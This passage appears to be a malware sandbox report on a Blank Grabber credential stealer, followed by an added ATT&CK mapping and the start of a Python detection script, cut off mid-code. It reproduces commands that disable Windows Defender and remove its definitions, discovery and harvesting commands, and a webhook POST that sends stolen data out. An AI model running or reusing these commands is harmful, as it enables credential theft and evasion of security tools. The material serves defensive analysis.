                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520672083 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520713091 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520750999 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520788908 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.520831108 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.524710894 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.524864912 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.524893999 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.524914980 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.524924994 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.524979115 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.525011063 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.525043964 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.525070906 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.525116920 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.525187016 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.525223970 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.534970999 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535166979 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535183907 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535218000 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535227060 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535243034 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535281897 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535334110 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535366058 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:42.535679102 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.386673927 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.386856079 CET44349744162.159.137.232192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.386931896 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.387562037 CET49744443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.398077011 CET4974380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.403337955 CET8049743208.95.112.1192.168.2.4
                                                                                                                                                                                                                                            Nov 17, 2024 11:22:43.403388023 CET4974380192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 11:22:40.987288952 CET | 56010 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 11:22:40.994477034 CET | 53 | 56010 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 11:22:41.859014988 CET | 53297 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 11:22:41.865782022 CET | 53 | 53297 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 17, 2024 11:22:40.987288952 CET | 192.168.2.4 | 1.1.1.1 | 0x1f56 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:41.859014988 CET | 192.168.2.4 | 1.1.1.1 | 0x81ee | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 17, 2024 11:22:40.994477034 CET | 1.1.1.1 | 192.168.2.4 | 0x1f56 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:41.865782022 CET | 1.1.1.1 | 192.168.2.4 | 0x81ee | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:41.865782022 CET | 1.1.1.1 | 192.168.2.4 | 0x81ee | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:41.865782022 CET | 1.1.1.1 | 192.168.2.4 | 0x81ee | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:41.865782022 CET | 1.1.1.1 | 192.168.2.4 | 0x81ee | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 11:22:41.865782022 CET | 1.1.1.1 | 192.168.2.4 | 0x81ee | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 208.95.112.1 | 80 | 7324 | C:\Users\user\Desktop\program.exe
Timestamp | Bytes transferred | Direction | Data
Nov 17, 2024 11:22:41.000364065 CET | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3
Nov 17, 2024 11:22:41.646361113 CET | 375 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 10:22:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 198
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 72 65 76 65 72 73 65 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"Texas","timezone":"America/Chicago","reverse":"173.254.250.70.static.quadranet.com","mobile":false,"proxy":false,"query":"173.254.250.70"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49744 | 162.159.137.232 | 443 | 7324 | C:\Users\user\Desktop\program.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 10:22:42 UTC | 302 | OUT | POST /api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                            Content-Length: 766741
                                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=759108746665450e003c83e6b292e39f
                                                                                                                                                                                                                                            2024-11-17 10:22:42 UTC16384OUTData Raw: 2d 2d 37 35 39 31 30 38 37 34 36 36 36 35 34 35 30 65 30 30 33 63 38 33 65 36 62 32 39 32 65 33 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 72 96 bf 67 21 04 00 00 01 0f 77 40 86 04 aa ad bb 83 46 e2 75 ca e0 8b b5 c1 ae 9f 76 d6 5f e9 7f 94 6c e1 e2 54 27 1c 9e a6 c8 94 15 17 46 c0 23 49 45 ea c3 87 56 0d c2 e7 32 25 f7 b6 dc ae c0 60 03 42 01 7a 78 d7 4f b7 d4 28 8f 24 5b 7b ac 34 86 e0 52 d0 c5 53 b4 14 39 c4 67 84 9d b4
                                                                                                                                                                                                                                            Data Ascii: --759108746665450e003c83e6b292e39fContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!rg!w@Fuv_lT'F#IEV2%`BzxO($[{4RS9g
2024-11-17 10:22:43 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Sun, 17 Nov 2024 10:22:43 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731838964
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kw%2FMCC3nxYl1Sb3abNC0WpO%2FFrUHsOgYiaVPTDATc2ZXBunk234OqISsKrlIBESZZz3Fw35sEraQjNMdFhDGCmXh9SjSXz4cgxjnZha1bFkdj228QxWzxWkoww2m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=7f3eb00f74a25652e1281dc04aa6cdbfe83e4455-1731838963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=ffpl7Z_XRbw2jJzUSb94O3lzwZOtlB08ocIN8D03Ggs-1731838963322-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e3f004c2e334678-DFW


                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:05:22:02
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\program.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6b7500000
                                                                                                                                                                                                                                            File size:7'954'796 bytes
                                                                                                                                                                                                                                            MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

Target ID: 1
Start time: 05:22:02
Start date: 17/11/2024
Path: C:\Users\user\Desktop\program.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\program.exe"
Imagebase: 0x7ff6b7500000
File size: 7'954'796 bytes
MD5 hash: 3E6865657B29FAEA3A355C710F0AAD45
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 05:22:04
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 05:22:04
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 05:22:04
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 05:22:04
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 05:22:05
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 05:22:05
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 05:22:05
Start date: 17/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 05:22:05
Start date: 17/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:05:22:05
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:05:22:06
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff77aff0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

Target ID: 18
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff77aff0000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase: 0x7ff71fde0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 05:22:07
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase: 0x7ff7bb830000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

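The five command lines in Targets 18 through 25 (tasklist /FO LIST, the WMIC SecurityCenter2 AntivirusProduct query, powershell Get-Clipboard, tree /A /F and netsh wlan show profile) are the stealer's discovery and harvesting burst, each wrapped in cmd.exe /c with a conhost.exe child that carries no signal of its own. The detection below is an added example, not part of this report or of Joe Sandbox's own tooling: it takes process-creation events (the fields Sysmon event 1 or Security 4688 provide), attributes every matching command to the nearest ancestor that is not cmd.exe or conhost.exe, and flags an origin process that drives three or more distinct techniques within a short window. The sample events are constructed from the command lines above with made-up PIDs and a hypothetical sample path; the ATT&CK mapping is my own, not the report's.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    """One process-creation event (the fields Sysmon EID 1 / Security 4688 carry)."""
    ts: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str


# Command lines taken from the report's process tree, each mapped to the
# ATT&CK technique it implements. The mapping is mine, not the sandbox's.
TECHNIQUES = {
    "T1057 Process Discovery": re.compile(r"\btasklist\b.*/FO\s+LIST", re.I),
    "T1518.001 Security Software Discovery": re.compile(r"\bWMIC\b.*SecurityCenter2.*AntivirusProduct", re.I),
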